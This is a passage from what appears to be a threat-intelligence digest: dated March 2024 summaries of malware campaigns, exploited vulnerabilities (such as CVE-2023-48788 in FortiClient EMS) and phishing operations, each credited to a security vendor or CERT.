- Adlumin researchers detected a breach where attackers evaded Duo, a widely-used zero-trust security tool, to illicitly access a company’s networks. Adlumin urges organizations to review user access policies for accuracy and evaluate the security implications of allowing select users to bypass 2FA.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Exploiting_FortiClient_EMS_Vulnerability_Actively
- Date of Scan:
- 2024-03-29
- Impact:
- MEDIUM
- Summary:
- Researchers from Unit 42 have discovered ongoing exploits for the recently discovered FortiClient EMS vulnerability, CVE-2023-48788. Unauthorized installs of Meterpreter, ScreenConnect Client, and Atera Agent were caused by this action.
—
- Intel Source:
- Checkmarx
- Intel Name:
- PyPi_Suspends_Project_Creation_and_User_Registration_Amid_Security_Threat
- Date of Scan:
- 2024-03-28
- Impact:
- LOW
- Summary:
- Checkmarx researchers uncovered a campaign leveraging numerous malicious packages, employing Typosquatting attacks through CLI for Python package installations. The attackers aim to pilfer crypto wallets, browser data, and credentials, employing persistence mechanisms for survival across reboots.
Source:
https://checkmarx.com/blog/pypi-is-under-attack-project-creation-and-user-registration-suspended/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- JavaScript_to_AsyncRAT_Transition
- Date of Scan:
- 2024-03-28
- Impact:
- LOW
- Summary:
- SANS researchers have analyzed and discovered an intriguing piece of JavaScript. This one was obfuscated quite effectively. The file was named “_Rechnung_01941085434_PDF.js” (Invoice in German). The first obfuscation method is simple yet effective, as it stops a lot of utilities from operating correctly on distributions such as REMnux.
Source:
https://isc.sans.edu/diary/From+JavaScript+to+AsyncRAT/30788
—
- Intel Source:
- PaloAlto
- Intel Name:
- Malicious_Google_Ad_Leads_To_Matanbuchus_Infection_With_DanaBot
- Date of Scan:
- 2024-03-28
- Impact:
- LOW
- Summary:
- Researchers at PaloAlto have discovered that a Google advertisement leads users to a fake funds claim website, which spreads the Danabot Matanbuchus.
—
- Intel Source:
- CERT-AGID
- Intel Name:
- AgentTesla_Expands_Its_Footprint_in_Italy
- Date of Scan:
- 2024-03-28
- Impact:
- MEDIUM
- Summary:
- Operators of AgentTesla have recently stepped up their malspam efforts in Italy, supporting the upward trend in PDF attachment usage that has been noted in recent months. These documents have links that, when clicked, cause files containing malicious JavaScript code to be downloaded.
—
- Intel Source:
- EclecticIQ
- Intel Name:
- Cyber_Espionage_Campaign_Targeting_Indian_Government_Entities_and_Energy_Sector
- Date of Scan:
- 2024-03-28
- Impact:
- MEDIUM
- Summary:
- Researchers at EclecticIQ have discovered a new espionage effort that uses a customized version of HackBrowserData, an open-source information stealer that can gather cookies, history, and browser login credentials, to target Indian government entities and the nation’s energy sector.
—
- Intel Source:
- Esentire
- Intel Name:
- Exploitation_of_Fortinet_Vulnerability_CVE_2023_48788
- Date of Scan:
- 2024-03-28
- Impact:
- MEDIUM
- Summary:
- This month, eSentire has tracked a spike in the exploitation of CVE-2023-48788 (CVSS: 9.8). CVE-2023-48788 is a SQL injection flaw in FortiClientEMS software. Exploitation would allow an unauthenticated remote threat actor to execute code or commands through specially crafted requests, enabling initial organizational access.
—
- Intel Source:
- CYFIRMA Research
- Intel Name:
- A_New_Info_Stealer_Named_Sync_Scheduler
- Date of Scan:
- 2024-03-28
- Impact:
- LOW
- Summary:
- Cyfirma researchers have found Sync-Scheduler, an information-stealing malware that targets documents in particular and has anti-analysis built in. The research details the procedures used to create malware payloads and investigates the evasion strategies used by threat actors to avoid detection through in-depth examination.
—
- Intel Source:
- Cyble
- Intel Name:
- After_FBI_Seizure_WarzoneRAT_Returns_With_Multi_Stage_Attack
- Date of Scan:
- 2024-03-28
- Impact:
- MEDIUM
- Summary:
- Researchers at Cyble have noticed a campaign with a tax theme that may have spread via spam emails. Investigations revealed that the campaign disseminated the malware WarzoneRAT (Avemaria). The malware known as AveMaria is a Remote Administration Tool (RAT) that possesses the ability to take commands from a Command and Control (C&C) server and carry out a range of malevolent activities.
Source:
https://cyble.com/blog/warzonerat-returns-with-multi-stage-attack-post-fbi-seizure/
—
- Intel Source:
- Securelist
- Intel Name:
- DinodasRAT_Linux_backdoor
- Date of Scan:
- 2024-03-28
- Impact:
- MEDIUM
- Summary:
- DinodasRAT, also known as XDealer, is a multi-platform backdoor written in C++ that offers a range of capabilities. This RAT allows the malicious actor to surveil and harvest sensitive data from a target’s computer. A Windows version of this RAT was used in attacks against government entities in Guyana.
Source:
https://securelist.com/dinodasrat-linux-implant/112284/
—
- Intel Source:
- Checkpoint
- Intel Name:
- The_Tax_Scam_Tsunami
- Date of Scan:
- 2024-03-28
- Impact:
- LOW
- Summary:
- Check Point Research team has observed multiple instances of tax-related phishing scams and malware. The attack is focusing on to induce the end-user to either give over sensitive information or money.
—
- Intel Source:
- Cyble
- Intel Name:
- A_recent_leak_of_a_Solana_drainer_source_code
- Date of Scan:
- 2024-03-28
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs (CRIL) found multiple drainer source codes leaked on cybercrime forums, including a recent leak of a Solana drainer’s source code.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- An_interesting_piece_of_JavaScript
- Date of Scan:
- 2024-03-28
- Impact:
- LOW
- Summary:
- Senior ISC Handler Xavier Mertens recently found an interesting piece of JavaScript payload and provided analysis. This payload was downloaded from hxxp://gklmeliificagac[.]top/vc7etyp5lhhtr.php?id=win10vm&key=127807548032&s=mints1. Once you fetched the page, it won’t work and will redirect you to another side. And Finally, another payload is delivered.
—
- Intel Source:
- Lumen
- Intel Name:
- The_Shadowy_Side_Of_TheMoon_Malware
- Date of Scan:
- 2024-03-27
- Impact:
- LOW
- Summary:
- Researchers at Lumen have discovered a multi-year campaign that targeting Internet of Things (IoT) devices and routers that are nearing end of life (EoL). This campaign is linked to an upgraded version of the malware known as “TheMoon.” Since its inception in 2014, TheMoon has been running in the background, amassing almost 40,000 bots from 88 countries in January and February of 2024. As researchers have observed, most of these bots serve as the backbone of Faceless, a well-known proxy service targeted at cybercriminals.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Enhance_Cyberespionage_Activities_Against_ASEAN_Nations_by_Two_Chinese_APT_Groups
- Date of Scan:
- 2024-03-27
- Impact:
- MEDIUM
- Summary:
- Researchers from Unit 42 have discovered two Chinese advanced persistent threat (APT) groups that are involved in cyberespionage against members and organizations connected to the Association of Southeast Asian Nations (ASEAN). Stately Taurus, the first APT organization, is believed to have targeted entities in Myanmar, the Philippines, Japan, and Singapore with two malware packages. An ASEAN-affiliated entity was infiltrated by the second Chinese APT outfit. In recent months, this APT group has attacked a number of government institutions in Southeast Asia, including those in Singapore, Laos, and Cambodia.
Source:
https://unit42.paloaltonetworks.com/chinese-apts-target-asean-entities/
—
- Intel Source:
- SOC Radar
- Intel Name:
- A_Robust_Cyberthreat_to_Brazil_Monetary_Security_CHAVECLOAK
- Date of Scan:
- 2024-03-27
- Impact:
- LOW
- Summary:
- CHAVECLOAK, a banking trojan that has become a serious threat, is a strong cyber threat threatening the Brazilian financial system. This sophisticated malware is made to get past security measures and steal confidential financial data from unsuspecting users.
Source:
https://socradar.io/chavecloak-cyber-threat-to-brazils-financial-security/
—
- Intel Source:
- Rewterz
- Intel Name:
- FormBook_Malware
- Date of Scan:
- 2024-03-27
- Impact:
- MEDIUM
- Summary:
- FormBook, an information stealer (infostealer) malware discovered in 2016, has various capabilities such as tracking keystrokes, accessing files, capturing screenshots, and stealing passwords from web browsers. It can execute additional malware as directed by a command-and-control server and is adept at evading detection through techniques like code obfuscation and encryption. FormBook’s flexibility allows customization for specific targets and its obfuscation methods make removal challenging. Cybercriminals distribute FormBook through email attachments like PDFs and Office Documents, with notable use during the 2022 Russia-Ukraine conflict. FormBook’s successor, XLoader, is currently active.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-formbook-malware-active-iocs-98
—
- Intel Source:
- Oligo Security
- Intel Name:
- Cyberattacks_Risk_Thousands_of_Businesses_Using_Ray_Framework
- Date of Scan:
- 2024-03-27
- Impact:
- LOW
- Summary:
- Researchers at Oligo have recently uncovered an ongoing campaign of attacks aimed at a flaw in the popular open-source AI framework Ray. There is no patch for a significant vulnerability that exposes thousands of businesses and servers using AI infrastructure to attack. Due to this flaw, hackers can commandeer the processing power of the organizations and reveal confidential information. For the past seven months, this vulnerability has been actively exploited, impacting a variety of industries including biopharma, education, and cryptocurrencies.
Source:
https://www.oligo.security/blog/shadowray-attack-ai-workloads-actively-exploited-in-the-wild
—
- Intel Source:
- Morphisec
- Intel Name:
- Increase_in_activity_linked_to_Mispadu_banking_trojan
- Date of Scan:
- 2024-03-27
- Impact:
- LOW
- Summary:
- Morphisec Labs identified a significant increase in activity linked to Mispadu, a banking trojan first flagged in 2019. Initially concentrated on LATAM countries and Spanish-speaking individuals, Mispadu has broadened its scope in the latest campaign.
Source:
https://blog.morphisec.com/mispadu-infiltration-beyond-latam
—
- Intel Source:
- Cybereason
- Intel Name:
- The_Effects_of_the_Anydesk_Breach
- Date of Scan:
- 2024-03-27
- Impact:
- LOW
- Summary:
- Researchers at Cybereason have looked at cases of AnyDesk code signing certificates being misused. On February 2, 2024, AnyDesk, a prominent global supplier of Remote Management and Monitoring (RMM) software, made a public announcement announcing that they had discovered a compromise involving production systems. As a result, they started an incident response process and, as part of their remediation activities, they issued fresh certificates and revoked all of their security-related ones.
Source:
https://www.cybereason.com/blog/threat-alert-the-anydesk-breach-aftermath
—
- Intel Source:
- SonicWall
- Intel Name:
- Introducing_The_Most_Recent_Version_of_WhiteSnake_Stealer
- Date of Scan:
- 2024-03-27
- Impact:
- LOW
- Summary:
- Researchers at SonicWall have discovered a new WhiteSnake Stealer version that makes it possible to steal vital, private information from infected systems.The string decryption code has been eliminated in this updated version, which also makes the code easier to understand.
—
- Intel Source:
- Sekoia
- Intel Name:
- Phishing_Kit_With_New_MFA_Targeting_Gmail_And_Microsoft_365_Accounts
- Date of Scan:
- 2024-03-26
- Impact:
- LOW
- Summary:
- Tycoon 2FA was first detected by Sekoia researchers in October 2023 while conducting standard threat hunting. However, it has been operational since August 2023, when the Saad Tycoon group made it available via secret Telegram channels. The Sekoia team thoroughly examined the Tycoon 2FA PhaaS kit and shared some of their discoveries to the Twitter community. Since then, researchers have been keeping a close eye on the putative developer’s activity, campaigns using the kit, source code upgrades, and the infrastructure of Tycoon 2FA phishing URLs.
—
- Intel Source:
- ASEC
- Intel Name:
- Unraveling_the_Kimsuky_Groups_Malware_Attacks_on_South_Korea
- Date of Scan:
- 2024-03-26
- Impact:
- LOW
- Summary:
- The Kimsuky group’s latest cyber espionage efforts against South Korean targets involve sophisticated malware, including a dropper masquerading as an installer from a public institution and the Endoor and Nikidoor backdoors for system infiltration and data theft. These attacks leverage social engineering, misuse of legitimate certificates, and command-and-control servers to achieve stealth, persistence, and exfiltration. Highlighting the critical need for updated security defenses and awareness, this analysis underscores the ongoing threat posed by the Kimsuky group’s advanced tactics.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Custom_PowerShell_Script_Allows_Agenda_Ransomware_to_Spreadto_vCenters_and_ESXi
- Date of Scan:
- 2024-03-26
- Impact:
- LOW
- Summary:
- Newer variants of the ransomware, particularly for its Rust form, have been discovered by TrendMicro researchers. Based on their observations, the Agenda ransomware gang deploys the ransomware binary using Cobalt Strike and Remote Monitoring and Management (RMM) technologies. Regarding the Agenda ransomware executable, it can spread using PsExec and SecureShell in addition to using other weak SYS drivers to get around security measures.
—
- Intel Source:
- CERT-AGID
- Intel Name:
- An_Attempt_to_Phish_Outlook_Addresses_PAs
- Date of Scan:
- 2024-03-26
- Impact:
- MEDIUM
- Summary:
- Researchers from CERT-AgID have alerted authorities to an ongoing campaign targeting public administrations with the goal of obtaining login credentials for Microsoft Outlook email accounts. In an effort to get login passwords and other sensitive data, attackers posing as company HR or accounting departments are sending fraudulent emails that purport to offer salary adjustments or access to electronic payslips.
Source:
https://cert-agid.gov.it/news/campagna-di-phishing-outlook-rivolta-alle-pa/
—
- Intel Source:
- Trustwave
- Intel Name:
- The_rise_of_Agent_Tesla
- Date of Scan:
- 2024-03-26
- Impact:
- MEDIUM
- Summary:
- SpiderLabs discovered some phishing email on March 8, 2024, with a Windows executable disguised as a fraudulent bank payment attached to the email. This activity initiated an infection chain culminating in the deployment of Agent Tesla. Trustwave blog shared their deep analysis of a newly identified loader, showing the attack’s advanced tactics, techniques, and procedures (TTPs) used in both the loader and its command and control (C2) framework.
—
- Intel Source:
- CERT-AGID
- Intel Name:
- Phishing_Attack_Designed_to_Steal_Security_Information_And_Credentials
- Date of Scan:
- 2024-03-26
- Impact:
- LOW
- Summary:
- Researchers from CERT-AGID have discovered a phishing page that targeting users of the Revenue Agency’s Siatel v2.0 – PuntoFisico of the Revenue Agency. It has been live online from the early afternoon of March 21, 2024. Once the victims have been tricked into entering their password and tax code as part of their access credentials, the attackers ask them to upload or complete a photo of the Security Matrix that corresponds with the given credentials. Access to Punto Fisico, Report Register, and Punto Fisico User Management are all dependent on the latter.
—
- Intel Source:
- Resecurity
- Intel Name:
- Online_scams_during_Ramadan_and_Eid_Fitr
- Date of Scan:
- 2024-03-25
- Impact:
- LOW
- Summary:
- This month during the holiday of Ramadan, Resecurity researchers discovered a significant spike in fraud activities and scams, coinciding with a surge in retail and online transactions.
—
- Intel Source:
- Sonatype
- Intel Name:
- Attackers_next_target_ML_AI_models
- Date of Scan:
- 2024-03-25
- Impact:
- LOW
- Summary:
- Sonatype analysts discovered a couple of open-source ML/AI models shared by data scientists and security researchers that proved that malware can creep onto AI platforms. Other examples include malicious models that were already reported by the community members and have since been booted off the platform.
Source:
https://blog.sonatype.com/open-source-ml/ai-models-attackers-next-potential-target
—
- Intel Source:
- Checkmarx
- Intel Name:
- Attack_using_fake_Python_Infrastructure
- Date of Scan:
- 2024-03-25
- Impact:
- LOW
- Summary:
- This month the Checkmarx researchers discovered a campaign targeting the software supply chain, with proof of the successful exploitation of multiple victims. These include the Top.gg GitHub organization (a community of over 170k users) and several individual developers.
Source:
https://checkmarx.com/blog/over-170k-users-affected-by-attack-using-fake-python-infrastructure/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- New_Go_loader_uses_Rhadamanthys_stealer
- Date of Scan:
- 2024-03-25
- Impact:
- MEDIUM
- Summary:
- Malwarebytes researchers described in their post a malvertising campaign with a new loader. The program is in the Go language and deploys a payload, the Rhadamanthys stealer. PuTTY is a trendy SSH and Telnet client for Windows that IT admins have used for years. The threat actor bought an ad that pretended to be the PuTTY homepage and appeared at the top of the Google search results page, right before the official website.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2024/03/new-go-loader-pushes-rhadamanthys
—
- Intel Source:
- Infoblox
- Intel Name:
- Cobalt_strike_DNS_early_detection
- Date of Scan:
- 2024-03-25
- Impact:
- LOW
- Summary:
- Infoblox presented their study demonstrating the value of detecting attempted DNS exfiltration and Command and Control (C2) communications. They focused their study on two anonymized customers: a large e-commerce/retail company (Customer #1) and an educational institution (Customer #2).
Source:
https://blogs.infoblox.com/cyber-threat-intelligence/dns-early-detection-cobalt-strike-dns-c2/
—
- Intel Source:
- Mandiant
- Intel Name:
- German_political_parties_attacked_by_APT29_with_WINELOADER
- Date of Scan:
- 2024-03-25
- Impact:
- MEDIUM
- Summary:
- In late February 2024, Mandiant identified APT29 — a Russian Federation-backed threat group linked by multiple governments to Russia’s Foreign Intelligence Service (SVR) — conducting a phishing campaign targeting German political parties.
Source:
https://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties
—
- Intel Source:
- Any.Run
- Intel Name:
- Reverse_Engineering_Snake_Keylogger_analysis
- Date of Scan:
- 2024-03-25
- Impact:
- LOW
- Summary:
- Any.Run researcher provided her sandbox analysis to understand the malware’s behavior. The insights from sandbox analysis provide a foundational understanding of reverse Engineering Snake Keylogger and of what to anticipate and what specific aspects to investigate during the reverse engineering process.
Source:
https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/
—
- Intel Source:
- PaloAlto
- Intel Name:
- Massive_StrelaStealer_Initiative_in_First_Half_of_2024
- Date of Scan:
- 2024-03-22
- Impact:
- LOW
- Summary:
- Researchers at PaloAlto have discovered a wave of extensive StrelaStealer campaigns that are affecting more than 100 organizations in the US and the EU. Spam emails with attachments that finally start the StrelaStealer DLL payload are the shape that these campaigns take.
Source:
https://unit42.paloaltonetworks.com/strelastealer-campaign/#post-133130-_vl741f7mzldf
—
- Intel Source:
- Sentilone
- Intel Name:
- AcidPour_new_embedded_wiper_variant_of_AcidRain
- Date of Scan:
- 2024-03-22
- Impact:
- MEDIUM
- Summary:
- The article discusses the discovery of a new variant of the malware AcidRain, called AcidPour, which has been causing disruptions in Ukraine and Europe during the Russian invasion. The section titled “Title-Abstract. Section intro” provides an overview of the AcidPour variant, including technical details such as its MD5, SHA1, SHA256, size, and type. It also highlights the similarities between AcidRain and AcidPour, as well as the added functionality of AcidPour for handling Unsorted Block Image (UBI) and Device Mapper (DM) logic. The section also notes the coding style of AcidPour and its self-delete function and alternate device wiping mechanism.
Source:
https://www.sentinelone.com/labs/acidpour-new-embedded-wiper-variant-of-acidrain-appears-in-ukraine/
—
- Intel Source:
- PaloAlto
- Intel Name:
- Technical_Analysis_of_FalseFont_Backdoor
- Date of Scan:
- 2024-03-22
- Impact:
- MEDIUM
- Summary:
- The article provides a detailed analysis of the FalseFont backdoor, a new malware developed by the Curious Serpens threat actor. The backdoor targets the aerospace and defense industries by masquerading as legitimate human resources software. The article discusses the backdoor’s architecture, functionality, and communication with threat actors, as well as ways to detect and prevent it. It also includes indicators of compromise and recommendations for improving security practices. The article also delves into the methods used by attackers to interact with the backdoor, including predefined commands and real-time communication through SignalR. It also describes the process of sending recurring requests to the backdoor’s command and control server.
Source:
https://unit42.paloaltonetworks.com/curious-serpens-falsefont-backdoor/
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA450_Uses_Embedded_Links_in_PDF_Attachments
- Date of Scan:
- 2024-03-22
- Impact:
- LOW
- Summary:
- The article discusses a recent phishing campaign by the threat actor TA450, targeting Israeli employees at large multinational organizations. The campaign used a pay-related social engineering lure and contained PDF attachments with malicious links to file-sharing sites. This marks a change in tactics for the threat actor, who typically uses malicious links directly in email bodies. The campaign also used a sender email account that matched the lure content and continued TA450’s trend of targeting Israeli individuals using Hebrew language lures and compromised .IL accounts. The section provides ET signatures and indicators of compromise for organizations to protect against this threat.
—
- Intel Source:
- Talos
- Intel Name:
- New_Details_on_TinyTurla_Post_Compromise_Activity
- Date of Scan:
- 2024-03-22
- Impact:
- LOW
- Summary:
- The article discusses the ongoing campaign by the Russian espionage group Turla, specifically their use of the TinyTurla-NG implant. New information is revealed on the group’s tactics, techniques, and procedures (TTPs) used to steal valuable information and spread through infected networks. The analysis, in collaboration with CERT.NGO, shows that Turla has infected multiple systems in a European NGO’s network. The attackers have taken preliminary post-compromise actions such as establishing persistence and adding exclusions to anti-virus products. They also used a custom-built Chisel beacon from an open-sourced offensive framework. The article provides a visual representation of the infection chain and offers ways for customers to detect and block this threat. It also includes a list of associated hashes, domains, and IP addresses.
Source:
https://blog.talosintelligence.com/tinyturla-full-kill-chain/
—
- Intel Source:
- Talos
- Intel Name:
- Pig_butchering_scams
- Date of Scan:
- 2024-03-22
- Impact:
- LOW
- Summary:
- The article discusses the evolution of social engineering tactics, specifically “catfishing” or “romance scams,” which involve scammers building relationships with targets to eventually scam them out of money. The section explains the process and differences between “pig butchering” and traditional romance scams, emphasizing the importance of user education and law enforcement involvement. It then transitions to discussing Talos’ research on the Turla APT and their use of a new tool, TinyTurla-NG, to target Polish NGOs and steal sensitive data. The section concludes by mentioning Talos’ efforts to provide detection content for Cisco Secure products and highlighting the top security headlines of the week.
Source:
https://blog.talosintelligence.com/threat-source-newsletter-march-21-2024/
—
- Intel Source:
- Mandiant
- Intel Name:
- Chinese_Government_Hacker_Using_ScreenConnect_and_F5_Bugs_to_Attack_Defense_and_Government_Entities
- Date of Scan:
- 2024-03-22
- Impact:
- MEDIUM
- Summary:
- A hacker allegedly connected to the People’s Republic of China has been exploiting two popular vulnerabilities to attack U.S. defense contractors, U.K. government entities and institutions in Asia.
Source:
https://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect
—
- Intel Source:
- Recorded Future
- Intel Name:
- Numerous_Chinese_State_Sponsored_Groups_Are_Associated_With_Private_Contractor
- Date of Scan:
- 2024-03-21
- Impact:
- LOW
- Summary:
- A fresh perspective on the latest i-SOON leak is provided by New Insight Group Research. China’s state-sponsored cyber espionage operations were made public on February 18, 2024, according to an anonymous document leak from Anxun Information Technology Co., Ltd. (i-SOON), a cybersecurity and IT company in China. The breach is noteworthy because it exposes the links between i-SOON and a number of state-sponsored cyber groups in China, including RedAlpha, RedHotel, and POISON CARP. These connections point to a complex web of espionage activities, including the theft of communications records in order for tracking down specific individuals.
Source:
https://go.recordedfuture.com/hubfs/reports/cta-2024-0320.pdf
—
- Intel Source:
- ASEC
- Intel Name:
- Caution_Regarding_Infostealer_Posing_as_Installer
- Date of Scan:
- 2024-03-21
- Impact:
- LOW
- Summary:
- Researchers from ASEC have seen a widespread distribution of the StealC malware, which is disguising itself as an installer. It was found to be downloaded through Dropbox, GitHub, Discord, and other services. It is anticipated that victims will be redirected several times from a malicious webpage masquerading as a download page for a specific program to the download URL, given the incidents of dissemination via similar pathways.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- AceCryptor_Malware_Increased_Throughout_Europe
- Date of Scan:
- 2024-03-21
- Impact:
- LOW
- Summary:
- ESET researchers have been studying AceCryptor for years, and on Wednesday they said that the latest campaign differed from earlier versions due to the attackers’ increased arsenal of harmful code. Typically, AceCryptor is used in conjunction with malware called Remcos or Rescoms, a potent remote surveillance tool that researchers have frequently observed being utilized against Ukrainian businesses.
Source:
https://www.welivesecurity.com/en/eset-research/rescoms-rides-waves-acecryptor-spam/
—
- Intel Source:
- Rapid7
- Intel Name:
- The_Kimsuky_threat_actor_group_activity
- Date of Scan:
- 2024-03-21
- Impact:
- MEDIUM
- Summary:
- The article discusses the latest tactics and techniques used by the Kimsuky threat actor group, also known as Black Banshee or Thallium. The group, originating from North Korea, primarily focuses on intelligence gathering and has targeted South Korean government entities, individuals involved in the Korean peninsula’s unification process, and global experts in fields relevant to the regime’s interests. The section highlights the group’s evolving methods, such as using weaponized Office documents, ISO files, and shortcut files (LNK files) to bypass modern security measures. The latest findings reveal that the group is now using CHM files, which are compiled HTML help files, to distribute malware and gain access to their targets. The section provides a detailed analysis of a CHM file used by the group, including its file structure, language, and code snippets. It also explains how the group uses HTML and ActiveX to execute arbitrary commands on a victim’s machine and create persistence. The article also includes a visualization of the attack flow and a list of detections that Rapid7 customers can use to protect against this campaign. Overall, the article sheds light on the Kimsuky threat actor group’s tactics and provides valuable insights for organizations to protect themselves against this campaign.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Investigations_into_CVE_2024_21762_Vulnerability_and_Fortinet_FortiOS
- Date of Scan:
- 2024-03-21
- Impact:
- LOW
- Summary:
- ISC.SANS researchers have noticed that an attack for CVE-2024-21762 has leaked on GitHub. The FortiOS operating system from Fortinet is vulnerable. February 8th saw the release of a patch. Device owners were given more than a month to apply the fix. A few days before the exploit was released on GitHub, it was made available on the Chinese QQ messaging network.
Source:
https://isc.sans.edu/diary/Scans+for+Fortinet+FortiOS+and+the+CVE202421762+vulnerability/30762/
—
- Intel Source:
- Sucuri
- Intel Name:
- Sign1_malware_analysis
- Date of Scan:
- 2024-03-21
- Impact:
- LOW
- Summary:
- The article titled “Sign1 Malware: Analysis, Campaign History & Indicators of Compromise” delves into the details of a recent malware campaign known as Sign1. The campaign has affected over 39,000 websites in the past 6 months and is typically injected through custom HTML widgets. The malware redirects users to malicious sites, often related to the VexTrio scam. The section provides a comprehensive analysis of the campaign, including its evolution since it was first noticed in 2023. The attackers have changed their obfuscation methods and use a timestamp trick in their URLs. The section also lists the various domains used by the attackers and their registration dates, as well as the number of infected sites associated with each domain. The author recommends securing the admin panel and using website monitoring tools to protect against this type of malware. The article also includes a case study of a client who experienced the Sign1 malware and how they traced it back to the campaign. The section discusses the various indicators of compromise for this malware, including its campaign history, obfuscation techniques, and how to detect and mitigate it. The author provides a breakdown of the JavaScript code used in the malware and how it dynamically generates URLs to redirect visitors to scam sites. The section concludes with a list of conditions that must be met for the malware to execute, including a specific cookie and correct referrer. Overall, the article provides a detailed overview of the Sign1 malware campaign and offers valuable insights for website owners to protect against it.
—
- Intel Source:
- Imperva
- Intel Name:
- New_Sysrv_botnet_variant_spreads_XMRig_Miner
- Date of Scan:
- 2024-03-21
- Impact:
- MEDIUM
- Summary:
- A new variant of the Sysrv botnet was observed exploiting vulnerabilities in Apache Struts and Atlassian Confluence to spread an XMRig cryptominer payload. The malware made use of a compromised Malaysian academic website and Google subdomain to distribute malicious files. Enhancements include obfuscation and architecture preparation functions. The malware connects to MoneroOcean mining pool endpoints and mines to a specific wallet. Defenders should block suspicious outbound connections and inspect seemingly legitimate sites for malicious files.
—
- Intel Source:
- Trend Micro
- Intel Name:
- Exploits_For_TeamCity_Vulnerabilities_Lead_to_Jasmin_Ransomware
- Date of Scan:
- 2024-03-20
- Impact:
- LOW
- Summary:
- A serious risk to enterprises using TeamCity On-Premises for their CI/CD procedures is the active exploitation of vulnerabilities in the platform. According to Trend Micro telemetry, threat actors are using these vulnerabilities to infect infected TeamCity servers with ransomware, coinminers, and backdoor payloads.
—
- Intel Source:
- Juniper
- Intel Name:
- Androshield_malware_targets_networks
- Date of Scan:
- 2024-03-20
- Impact:
- MEDIUM
- Summary:
- The article discusses the importance of patch management and network security measures in protecting networks from cyber threats. It specifically focuses on the Androxgh0st malware, which targets Laravel applications and exploits vulnerabilities such as CVE-2017-9841 and CVE-2018-15133. The article provides a technical analysis of the malware and its methods of exploitation, as well as ways to protect against it, such as encrypting sensitive information and using multi-factor authentication. It also highlights the use of Juniper IDS and ATP Cloud as a proactive defense against Androxgh0st and other cyber attacks. The article also discusses potential network disruptions caused by exploits of SMTP, AWS, SendGrid, and Twilio, and the risk of data breaches through the exploitation of .env files. It concludes by emphasizing the importance of regularly updating and patching systems, as well as implementing strong security measures to prevent unauthorized access and mitigate risks.
Source:
https://blogs.juniper.net/en-us/security/shielding-networks-against-androxgh0st
—
- Intel Source:
- SentinelLabs
- Intel Name:
- New_AcidPour_Data_Wiper_Targeting_Linux_x86_Network_Devices
- Date of Scan:
- 2024-03-20
- Impact:
- LOW
- Summary:
- Researchers at SentinelLabs have discovered AcidPour, a new harmful malware that targets Linux x86 networking and Internet of Things devices and has data-wiper functionality. While AcidPour and AcidRain target comparable directories and device paths found in embedded Linux distributions, there is an estimated 30% overlap in their codebases.
—
- Intel Source:
- ASEC
- Intel Name:
- The_Revival_of_a_Notorious_Ransomware_Threat
- Date of Scan:
- 2024-03-19
- Impact:
- MEDIUM
- Summary:
- AhnLab Security Intelligence Center (ASEC) has uncovered the resurgence of CryptoWire, a ransomware strain that wreaked havoc back in 2018. Utilizing Autoit scripting and distributed primarily through phishing emails, CryptoWire exhibits sophisticated features including self-replication, network exploration for file encryption, and data deletion measures to thwart recovery efforts. Unlike many ransomware variants, CryptoWire exposes decryption keys, either embedded within the malware or transmitted to the threat actor’s server. With its file encryption tactics and demand for ransom, users are urged to exercise caution, employ anti-malware solutions, and maintain up-to-date system security to thwart potential infections and safeguard against data loss.
—
- Intel Source:
- ASEC
- Intel Name:
- Persistent_Cyber_Threats_Targeting_Korean_Corporations
- Date of Scan:
- 2024-03-19
- Impact:
- LOW
- Summary:
- AhnLab Security Intelligence Center (ASEC) has uncovered a series of ongoing attacks by the Andariel group targeting Korean companies. Notably, the group leverages installations of MeshAgent alongside other remote management tools to facilitate diverse remote control capabilities. Exploiting Korean asset management solutions, the group installs malware such as AndarLoader and ModeLoader during lateral movement phases. AndarLoader, a downloader, retrieves executable data like .NET assemblies from C&C servers. MeshAgent, a remote management tool, enables screen control and was used for the first time by the Andariel group. ModeLoader, a JavaScript malware, is externally downloaded via Mshta for execution.
—
- Intel Source:
- Docguard
- Intel Name:
- Analysis_of_AutoIt_Malware
- Date of Scan:
- 2024-03-19
- Impact:
- LOW
- Summary:
- This article provides a comprehensive analysis of a lnk-based malware, including the process of static and AutoIt deobfuscation. It examines the important fields of the lnk file and identifies a malicious command that downloads and executes an HTA file from a remote server. The HTA file is manually downloaded and analyzed, revealing the use of forfiles.exe and PowerShell. The analysis also uncovers an embedded zip file, which is extracted and examined. A script is used to parse variables and remove unnecessary ones, and a list of IOCs is provided for this specific malware.
Source:
https://www.docguard.io/analysis-of-lnk-based-obfuscated-autoit-malware/
—
- Intel Source:
- Perception Point
- Intel Name:
- A_New_Phishing_Attack_That_Deploys_NetSupport_RAT
- Date of Scan:
- 2024-03-19
- Impact:
- LOW
- Summary:
- Israeli researchers at Perception Point have discovered a latest spearphishing effort aimed at American companies with the goal of installing the remote access trojan NetSupport RAT, also known as Operation PhantomBlu. By using OLE (Object Linking and Embedding) template alteration to run malicious code while avoiding detection, the PhantomBlu operation presents a sophisticated exploitation technique that departs from the standard NetSupport RAT distribution methodology.
—
- Intel Source:
- Shadowstackre
- Intel Name:
- A_new_ransomware_gang_called_Donex
- Date of Scan:
- 2024-03-19
- Impact:
- LOW
- Summary:
- The article discusses the operations of a new ransomware gang called Donex, specifically their ransomware variant known as ShadowStackRE. The section titled “Donex a new ransomware gang – ShadowStackRE” provides a thorough analysis of the pre-encryption setup, file and directory discovery, and encryption process used by this ransomware. The setup process involves creating a mutex, disabling file system redirection, and obtaining a cryptographic context. The file and directory discovery is carried out through multiple threads and targets specific processes for shutdown. The encryption process utilizes the Windows restart manager API and employs salsa20/chacha20 to encrypt data. The article also mentions the use of a blacklist, whitelist, and extensions in the configuration of the encryptor. The section concludes with a description of the cleanup process, which involves clearing event logs and restarting the system.
—
- Intel Source:
- Russian Panda
